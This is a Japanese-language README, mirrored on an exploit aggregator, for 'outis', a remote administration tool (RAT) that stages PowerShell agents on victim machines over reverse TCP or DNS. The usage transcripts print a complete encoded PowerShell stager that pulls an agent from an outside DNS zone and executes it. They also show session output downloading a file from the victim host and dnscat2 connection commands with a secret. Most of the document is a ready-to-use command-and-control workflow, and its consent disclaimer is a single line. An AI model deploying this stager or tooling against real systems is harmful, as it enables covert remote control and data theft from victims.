Sploitus

Exploit for outis

kitploit · 2026-09-04

Exploit Code

MARKDOWN329 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SYSS-RESEARCH-OUTIS
# outis

outisは、カスタムリモート管理ツール(RAT)またはそれに類するものです。MeterpreterやEmpre-Agentのようなものを想像してください。ただし、このツールの焦点は、エクスプロイトツールキット(エクスプロイトはありません)でも、ターゲットの永続的な管理でもありません。焦点は、サーバーとターゲットシステム間の通信、ファイル転送、ソケット共有、シェルの起動などを、さまざまな方法とプラットフォームを使用して行うことです。

# 名前について

ホメロスの『オデュッセイア』に登場するサイクロプスのポリュペーモスは、名前解決に問題を抱えていました。彼がオデュッセウスの名前を尋ねたとき、そのハッカーは古代ギリシャ語で「誰でもない」を意味する「Outis」と答えました。そのため、後にポリュペーモスが「誰でもない」が自分を殺そうとしていると叫んでも、奇妙なことに誰も助けに来ませんでした。

この素晴らしい古典の逸話を思い出してくれたMarcelに感謝します。

# ハンドラーの依存関係

Archlinuxユーザーは次のパッケージをインストールできます。

  * python3 # cmd、tempfileなどを含む
  * python-progressbar2
  * python-dnspython
  * python-crypto
  * python-pyopenssl
  * その他も必要になるかもしれません...



他のディストリビューションでは名前が異なる場合があります。たとえば、cryptoというモジュールとpycryptoというモジュールがあります。後者が必要です。

また、古いバージョンでは問題が発生する可能性があります。

  * pyopensslはバージョン16.1.0以降である必要があります。以下のように確認してください。



root@kitploit:~
    
    
       $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'
    

Python仮想環境は簡単にセットアップできます。

root@kitploit:~
    
    
    $ virtualenv outis-venv
    $ source ./outis-venv/bin/activate
    (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl
    

これにより、以下のパッケージリストが得られます。これは私の環境で動作しています。

root@kitploit:~
    
    
    $ pip freeze
    appdirs==1.4.3
    asn1crypto==0.22.0
    cffi==1.10.0
    cryptography==1.8.1
    dnspython==1.15.0
    idna==2.5
    packaging==16.8
    progressbar2==3.18.1
    pycparser==2.17
    pycrypto==2.6.1
    pyOpenSSL==16.2.0
    pyparsing==2.2.0
    python-utils==2.1.0
    six==1.10.0
    

# インストール

このgitリポジトリをrecursiveフラグ付きでクローンして、thirdpartytoolsフォルダ内のサブモジュールもクローンしてください。

root@kitploit:~
    
    
    git clone --recursive ...
    

ハンドラーはPython 3で動作します。依存関係をインストールして実行してください。スタージャー、エージェント、その他すべてを自動生成します。

低いポートをバインドするためにroot権限が必要ないようにするには、capabilityラッパーの使用を検討してください。

# 用語

  * **agent** : 被害システム上で実行されるソフトウェア
  * **handler** : コマンドを解析し、エージェントを指揮するソフトウェア(通常はサーバー上で実行)
  * **stager** : エージェントをダウンロード(トランスポートモジュールを使用)して実行する短いスクリプト
  * **transport** : stager/agentとhandler間の通信チャネル(例:ReverseTCP)
  * **platform** : stager/agentスクリプトに使用する被害者のアーキテクチャ(例:PowerShell)



# 現在サポートされているプラットフォーム

  * PowerShell(部分的)



# 現在サポートされているトランスポート

  * Reverse TCP
  * DNS(ステージング用にはタイプTXTまたはA、エージェント接続用にはタイプTXT、CNAME、MX、AAAA、A)



# 現在サポートされている暗号化

  * エージェントステージは、循環XORを使用してエンコード可能(難読化のため、セキュリティ目的ではない)
  * エージェントステージは、RSA署名とピン留め証明書を使用して認証可能
  * トランスポート接続は、TLSとピン留め証明書を使用して暗号化/認証可能



# 現在サポートされているコマンドと制御

  * pingリクエストによる接続テスト(部分的)
  * テキストメッセージ形式(部分的)
  * ファイルのアップロードとダウンロード



# 現在サポートされている追加機能

  * DNSトランスポートとpowershellを使用する場合、デフォルトのoutisエージェントの代わりに、thirdpartytoolsディレクトリからdnscat2 / dnscat2-powershellツールをステージングできます。プラットフォームオプションのAGENTTYPEをDNSCAT2(時間はかかりますがDNSのみを使用してステージング)またはDNSCAT2DOWNLOADER(HTTPSを使用したダウンロードを試行)に設定してください。



# 使用例

POWERSHELLプラットフォームを使用したステージングDNSトランスポートによるファイルのダウンロードは、次のようになります。

root@kitploit:~
    
    
    $ outis
    outis> set TRANSPORT DNS
    outis> set ZONE zfs.sy.gs
    outis> set AGENTDEBUG TRUE
    outis> info
    [+] Options for the Handler:
    Name               Value       Required  Description                                                      
    -----------------  ----------  --------  -----------------------------------------------------------------
    TRANSPORT          DNS         True      Communication way between agent and handler (Options: REVERSETCP,
                                              DNS)
    CHANNELENCRYPTION  TLS         True      Encryption Protocol in the transport (Options: NONE, TLS)
    PLATFORM           POWERSHELL  True      Platform of agent code (Options: POWERSHELL)
    PROGRESSBAR        TRUE        True      Display a progressbar for uploading / downloading? (only if not 
                                             debugging the relevant module) (Options: TRUE, FALSE)
    
    [+] Options for the TRANSPORT module DNS:
    Name       Value        Required  Description                                                             
    ---------  -----------  --------  ------------------------------------------------------------------------
    ZONE       zfs.sy.gs    True      DNS Zone for handling requests
    LHOST      0.0.0.0      True      Interface IP to listen on
    LPORT      53           True      UDP-Port to listen on for DNS server
    DNSTYPE    TXT          True      DNS type to use for the connection (stager only, the agent will 
                                      enumerate all supported types on its own) (Options: TXT, A)
    DNSSERVER               False     IP address of DNS server to connect for all queries
    
    [+] Options for the PLATFORM module POWERSHELL:
    Name                  Value                       Required  Description                                   
    --------------------  --------------------------  --------  ----------------------------------------------
    STAGED                TRUE                        True      Is the communication setup staged or not? 
                                                                (Options: TRUE, FALSE)
    STAGEENCODING         TRUE                        True      Should we send the staged agent in an encoded 
                                                                form (obscurity, not for security!) (Options: 
                                                                TRUE, FALSE)
    STAGEAUTHENTICATION   TRUE                        True      Should the stager verify the agent code 
                                                                before executing (RSA signature verification 
                                                                with certificate pinning) (Options: TRUE, 
                                                                FALSE)
    STAGECERTIFICATEFILE  $TOOLPATH/data/outis.pem    False     File path of a PEM with both RSA key and 
                                                                certificate to sign and verify staged agent 
                                                                with (you can generate a selfsigned cert by 
                                                                using the script gencert.sh initially)
    AGENTTYPE             DEFAULT                     True      Defines which agent should be used (the 
                                                                default outis agent for this plattform, or 
                                                                some third party software we support) 
                                                                (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)
    TIMEOUT               9                           True      Number of seconds to wait for each request 
                                                                (currently only supported by DNS stagers)
    RETRIES               2                           True      Retry each request for this number of times 
                                                                (currently only supported by DNS stagers)
    AGENTDEBUG            TRUE                        True      Should the agent print and log debug messages 
                                                                (Options: TRUE, FALSE)
    outis> generatestager
    [+] Use the following stager code:
    powershell.exe -Enc JAByAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAYQA9ACIAIgA7ACQAdAA9ADAAOwBmAG8AcgAoACQAaQA9ADAAOwA7
      ACQAaQArACsAKQB7ACQAYwA9ACgAWwBzAHQAcgBpAG4AZwBdACgASQBFAFgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AdAB5AHAAZQA9AFQAWA
      BUACAALQB0AGkAbQBlAG8AdQB0AD0AOQAgAHMAJAAoACQAaQApAHIAJAAoACQAcgApAC4AegBmAHMALgBzAHkALgBnAHMALgAgACIAKQApAC4A
      UwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQA7AGkAZgAoACEAJABjACkAewBpAGYAKAAkAHQAKwArAC0AbAB0ADIAKQB7ACQAaQAtAC0AOwBjAG
      8AbgB0AGkAbgB1AGUAOwB9AGIAcgBlAGEAawA7AH0AJAB0AD0AMAA7ACQAYQArAD0AJABjADsAfQAkAGEAPQBbAEMAbwBuAHYAZQByAHQAXQA6
      ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQApADsAJABiAD0AJABhAC4ATABlAG4AZwB0AGgAOwAkAGYAcAA9ACIAWA
      B4AEkAMgArAGUAQgBoAGUAUgBMAFMATQBuAHIAVQBNAFgAbgBnAHIARABTAGQATwAyAGQAOAAwAGMAZAB2AHcAcwBKAGMAYwBGAEIAbgAvAGYA
      LwB3AEoATwBpAEIAVAA4AGIATwA2AHAAZgBXAFgAdwBwAEUATwBQAFAAUgBsAFAAdgBnAE8AbgBlAGcAYwBpAE8AYgBPAGEAZABOAFAAVQBxAH
      AAZgBRAD0APQAiADsAJABpAD0AMAA7ACQAYQA9ACQAYQB8ACUAewAkAF8ALQBiAFgAbwByACQAZgBwAFsAJABpACsAKwAlACQAZgBwAC4ATABl
      AG4AZwB0AGgAXQB9ADsAJABwAGsAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAwACwANwA1ADUAKQA7ACQAcw
      BpAGcAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAA3ADUANQAsADYAOAA0ACkAOwAkAHMAPQBOAGUAdwAtAE8A
      YgBqAGUAYwB0ACAAUwB0AHIAaQBuAGcAKAAkAGEALAAxADQAMwA5ACwAKAAkAGIALQAxADQAMwA5ACkAKQA7ACQAcwBoAGEAPQBOAGUAdwAtAE
      8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBTAEgAQQA1ADEAMgBNAGEAbgBhAGcAZQBk
      ADsAaQBmACgAQAAoAEMAbwBtAHAAYQByAGUALQBPAGIAagBlAGMAdAAgACQAcwBoAGEALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAHAAaw
      AuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAKQAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIA
      aQBuAGcAKAAkAGYAcAApACkAIAAtAFMAeQBuAGMAVwBpAG4AZABvAHcAIAAwACkALgBMAGUAbgBnAHQAaAAgAC0AbgBlACAAMAApAHsAIgBFAF
      IAUgBPAFIAMQAiADsARQB4AGkAdAAoADEAKQB9ADsAJAB4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5
      AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIAOwAkAHgALgBGAHIAbw
      BtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAGsAKQA7AGkAZgAoAC0ATgBvAHQAIAAkAHgALgBWAGUAcgBpAGYAeQBEAGEAdABhACgAJABzAC4A
      VABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAsACIAUwBIAEEANQAxADIAIgAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG
      UANgA0AFMAdAByAGkAbgBnACgAJABzAGkAZwApACkAKQB7ACIARQBSAFIATwBSADIAIgA7AEUAeABpAHQAKAAyACkAfQA7ACIARwBPAEEARwBF
      AE4AVAAiADsASQBFAFgAIAAkAHMAOwA=
    outis> run
    [+] DNS listening on 0.0.0.0:53
    [+] Sending staged agent (34332 bytes)...
    100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16
    [+] Staging done
    [+] Waiting for connection and TLS handshake...
    [+] Initial connection with new agent started
    [+] Upgrade to TLS done
    outis session> [+] AGENT: Hello from Agent
    
    outis session> download C:\testfile.txt /tmp/out.txt
    [+] initiating download of remote file C:\testfile.txt to local file /tmp/out.txt
    [+] agent reports a size of 3295 bytes for channel 1
    100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00
    [+] wrote 3295 bytes to file /tmp/out.txt
    outis session> exit
    Do you really want to exit the session and close the connection [y/N]? y
    outis> exit
    

または、dnscat2を実際の接続に使用し、outisはステージングにのみ使用したい場合もあります。

root@kitploit:~
    
    
    $ outis
    outis> set TRANSPORT DNS
    outis> set AGENTTYPE DNSCAT2
    outis> set ZONE zfs.sy.gs
    outis> run
    [+] DNS listening on 0.0.0.0:53
    [+] Sending staged agent (406569 bytes)...
    100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17
    [+] Staging done
    [+] Starting dnscat2 to handle the real connection
    
    New window created: 0
    New window created: crypto-debug
    Welcome to dnscat2! Some documentation may be out of date.
    
    auto_attach => false
    history_size (for new windows) => 1000
    Security policy changed: All connections must be encrypted and authenticated
    New window created: dns1
    Starting Dnscat2 DNS server on 0.0.0.0:53
    [domains = zfs.sy.gs]...
    
    Assuming you have an authoritative DNS server, you can run
    the client anywhere with the following (--secret is optional):
    
      ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs
    
    To talk directly to the server without a domain name, run:
    
      ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==
    
    Of course, you have to figure out <server> yourself! Clients
    will connect directly on UDP port 53.
    
    dnscat2> New window created: 1
    Session 1 Security: ENCRYPTED AND VERIFIED!
    (the security depends on the strength of your pre-shared secret!)
    
    dnscat2> sessions
    0 :: main [active]
      crypto-debug :: Debug window for crypto stuff [*]
      dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]
      1 :: command (feynman-win7) [encrypted and verified] [*]
      
    dnscat2> session -i 1
    New window created: 1
    history_size (session) => 1000
    Session 1 Security: ENCRYPTED AND VERIFIED!
    (the security depends on the strength of your pre-shared secret!)
    This is a command session!
    
    That means you can enter a dnscat2 command such as
    'ping'! For a full list of clients, try 'help'.
    
    command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt
    Attempting to download c:/testfile.txt to /tmp/out.txt
    Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!
    
    command (feynman-win7) 1> exit
    Input thread is over
    

# インスピレーション

このプロジェクトは、次のプロジェクトからインスピレーションを得て(そして恥知らずにもコードの一部を盗用して)います。

  * Empire:

    * https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py — generate_launcherはHTTP(S)ステージャーを使用
    * https://github.com/adaptivethreat/Empire/tree/master/data/agent — ステージャー(最初のランチャーの後のステップ2)とエージェント(ステップ3)
    * https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py — PowerShellスクリプトの生成とストリッピング
  * Metasploit:

    * https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb — bourneなど用のCmdStager
  * ReflectiveDLLInjection:

    * https://github.com/stephenfewer/ReflectiveDLLInjection
  * p0wnedShell:

    * https://github.com/Cn33liz/p0wnedShell — 将来使用するためのAMSI回避に関するいくつかのアイデア
  * dnscat2:

    * https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md — DNS上のプロトコル設計に関するアイデア
    * https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 — dnscat2エージェントのPowerShell版
  * dnsftp

    * https://github.com/breenmachine/dnsftp — DNS経由のステージャー用の短いスクリプト部分



# 免責事項

自己責任で使用してください。関係者全員の完全な同意なしに使用しないでください。 教育目的のみに使用してください。